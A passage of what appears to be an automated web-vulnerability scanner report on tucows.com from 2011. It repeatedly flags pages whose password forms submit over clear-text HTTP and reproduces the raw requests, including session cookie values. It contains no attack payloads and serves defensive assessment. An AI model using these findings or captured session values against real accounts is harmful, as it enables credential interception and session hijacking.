Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.52. http://www.tucows.com/images/newassets/javascript:void(null)  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/javascript:void(null)

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /images/newassets/javascript:void(null) HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.53. http://www.tucows.com/images/newassets/javascript:void(null)  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/javascript:void(null)

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /images/newassets/javascript:void(null) HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.54. http://www.tucows.com/images/newassets/lostpass.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/lostpass.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /images/newassets/lostpass.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.55. http://www.tucows.com/images/newassets/lostpass.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/lostpass.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /images/newassets/lostpass.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.56. http://www.tucows.com/images/newassets/privacy.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/privacy.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /images/newassets/privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.57. http://www.tucows.com/images/newassets/privacy.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/privacy.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /images/newassets/privacy.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.58. http://www.tucows.com/images/newassets/safesearchtoggle.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/safesearchtoggle.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /images/newassets/safesearchtoggle.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.59. http://www.tucows.com/images/newassets/safesearchtoggle.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/safesearchtoggle.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /images/newassets/safesearchtoggle.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.60. http://www.tucows.com/images/newassets/search.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/search.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /images/newassets/search.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.61. http://www.tucows.com/images/newassets/search.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/search.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /images/newassets/search.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.62. http://www.tucows.com/images/newassets/sitemap.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/sitemap.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /images/newassets/sitemap.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.63. http://www.tucows.com/images/newassets/sitemap.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/sitemap.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /images/newassets/sitemap.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
